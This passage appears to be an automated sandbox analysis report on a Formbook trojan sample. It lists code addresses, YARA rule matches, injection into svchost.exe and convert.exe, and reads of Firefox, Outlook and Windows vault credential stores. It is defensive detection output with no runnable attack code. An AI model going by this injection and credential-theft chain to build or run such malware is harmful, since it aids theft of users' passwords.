Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EA16CC 8_2_02EA16CC
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E35630 8_2_02E35630
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EAF7B0 8_2_02EAF7B0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DE1460 8_2_02DE1460
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EAF43F 8_2_02EAF43F
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EB95C3 8_2_02EB95C3
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E8D5B0 8_2_02E8D5B0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EA7571 8_2_02EA7571
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E9DAC6 8_2_02E9DAC6
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E35AA0 8_2_02E35AA0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E8DAAC 8_2_02E8DAAC
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E91AA3 8_2_02E91AA3
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E63A6C 8_2_02E63A6C
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EAFA49 8_2_02EAFA49
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EA7A46 8_2_02EA7A46
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E65BF0 8_2_02E65BF0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E2DBF9 8_2_02E2DBF9
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E0FB80 8_2_02E0FB80
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EAFB76 8_2_02EAFB76
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DF38E0 8_2_02DF38E0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E5D800 8_2_02E5D800
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DF9950 8_2_02DF9950
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E0B950 8_2_02E0B950
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E85910 8_2_02E85910
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DF9EB0 8_2_02DF9EB0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DB3FD2 8_2_02DB3FD2
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DB3FD5 8_2_02DB3FD5
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DF1F92 8_2_02DF1F92
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EAFFB1 8_2_02EAFFB1
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EAFF09 8_2_02EAFF09
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EAFCF2 8_2_02EAFCF2
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E69C32 8_2_02E69C32
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E0FDC0 8_2_02E0FDC0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EA7D73 8_2_02EA7D73
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DF3D40 8_2_02DF3D40
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EA1D5A 8_2_02EA1D5A
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_002416D0 8_2_002416D0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_0025A120 8_2_0025A120
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_0023C8F0 8_2_0023C8F0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_0023CB10 8_2_0023CB10
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_0023AB90 8_2_0023AB90
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_002431BB 8_2_002431BB
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_002431C0 8_2_002431C0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02AAB208 8_2_02AAB208
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02AAC1A8 8_2_02AAC1A8
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02AAA4BA 8_2_02AAA4BA
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02AAA4BF 8_2_02AAA4BF
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02AAA45B 8_2_02AAA45B
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02AABE06 8_2_02AABE06
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02AABCE8 8_2_02AABCE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 02FAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 02FBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 02F75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 02F87E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 02F2B970 appears 280 times
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: String function: 00830D27 appears 70 times
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: String function: 00838B40 appears 42 times
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: String function: 00817F41 appears 35 times
Source: C:\Windows\SysWOW64\convert.exe Code function: String function: 02E5EA12 appears 86 times
Source: C:\Windows\SysWOW64\convert.exe Code function: String function: 02DDB970 appears 280 times
Source: C:\Windows\SysWOW64\convert.exe Code function: String function: 02E25130 appears 58 times
Source: C:\Windows\SysWOW64\convert.exe Code function: String function: 02E6F290 appears 105 times
Source: C:\Windows\SysWOW64\convert.exe Code function: String function: 02E37E54 appears 111 times
Source: hkLFB22XxS.exe, 00000001.00000003.2109156800.00000000041E3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs hkLFB22XxS.exe
Source: hkLFB22XxS.exe, 00000001.00000003.2115117668.00000000043DD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs hkLFB22XxS.exe
Source: hkLFB22XxS.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@15/10
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087A2D5 GetLastError,FormatMessageW, 1_2_0087A2D5
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00868713 AdjustTokenPrivileges,CloseHandle, 1_2_00868713
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00868CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 1_2_00868CC3
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 1_2_0087B59E
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0088F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 1_2_0088F121
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008886D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 1_2_008886D0
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00814FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 1_2_00814FE9
Source: C:\Users\user\Desktop\hkLFB22XxS.exe File created: C:\Users\user\AppData\Local\Temp\aut8EC1.tmp Jump to behavior
Source: hkLFB22XxS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: convert.exe, 00000008.00000002.4573809328.0000000002983000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2745838231.0000000002963000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4573809328.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2745949723.0000000002983000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2747956351.000000000298E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: hkLFB22XxS.exe ReversingLabs: Detection: 67%
Source: unknown Process created: C:\Users\user\Desktop\hkLFB22XxS.exe "C:\Users\user\Desktop\hkLFB22XxS.exe"
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\hkLFB22XxS.exe"
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"
Source: C:\Windows\SysWOW64\convert.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\hkLFB22XxS.exe" Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe" Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: ifsutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: scecli.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: osuninst.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: hkLFB22XxS.exe Static file information: File size 1233920 > 1048576
Source: hkLFB22XxS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: hkLFB22XxS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: hkLFB22XxS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: hkLFB22XxS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: hkLFB22XxS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: hkLFB22XxS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: hkLFB22XxS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: convert.pdb source: svchost.exe, 00000002.00000002.2571611959.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2540180988.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000003.2509356666.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578051292.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493538091.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4570865384.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: hkLFB22XxS.exe, 00000001.00000003.2109624765.0000000004110000.00000004.00001000.00020000.00000000.sdmp, hkLFB22XxS.exe, 00000001.00000003.2108731153.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2478694477.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2476600596.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.000000000309E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2573868861.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2571707288.00000000029F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: hkLFB22XxS.exe, 00000001.00000003.2109624765.0000000004110000.00000004.00001000.00020000.00000000.sdmp, hkLFB22XxS.exe, 00000001.00000003.2108731153.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2478694477.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2476600596.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.000000000309E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, convert.exe, 00000008.00000002.4579007671.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2573868861.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2571707288.00000000029F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: convert.pdbGCTL source: svchost.exe, 00000002.00000002.2571611959.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2540180988.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000003.2509356666.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578051292.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: convert.exe, 00000008.00000002.4580175851.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000008.00000002.4573809328.0000000002904000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.0000000002DCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2852069782.000000003189C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: convert.exe, 00000008.00000002.4580175851.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000008.00000002.4573809328.0000000002904000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.0000000002DCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2852069782.000000003189C000.00000004.80000000.00040000.00000000.sdmp
Source: hkLFB22XxS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: hkLFB22XxS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: hkLFB22XxS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: hkLFB22XxS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: hkLFB22XxS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0088C304 LoadLibraryA,GetProcAddress, 1_2_0088C304
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00838B85 push ecx; ret 1_2_00838B98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004144AD push eax; ret 2_2_004144C5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00407823 push D4BE487Bh; retf 2_2_00407829
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004142D1 push ecx; ret 2_2_004142D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040D290 push edx; ret 2_2_0040D2CB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004073A5 push esi; retf 2_2_004073A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042C4A3 push edi; ret 2_2_0042C4AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403570 push eax; ret 2_2_00403572
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418708 push ecx; retn 7131h 2_2_00418703
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004077D2 push eax; ret 2_2_004077D8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417792 pushad ; retf 2_2_004177AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F0225F pushad ; ret 2_2_02F027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F027FA pushad ; ret 2_2_02F027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F0283D push eax; iretd 2_2_02F02858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F309AD push ecx; mov dword ptr [esp], ecx 2_2_02F309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F01368 push eax; iretd 2_2_02F01369
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DB225F pushad ; ret 8_2_02DB27F9
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DB27FA pushad ; ret 8_2_02DB27F9
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DB283D push eax; iretd 8_2_02DB2858
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DE09AD push ecx; mov dword ptr [esp], ecx 8_2_02DE09B6
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DB1368 push eax; iretd 8_2_02DB1369
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_00230000 push ebp; ret 8_2_00230005
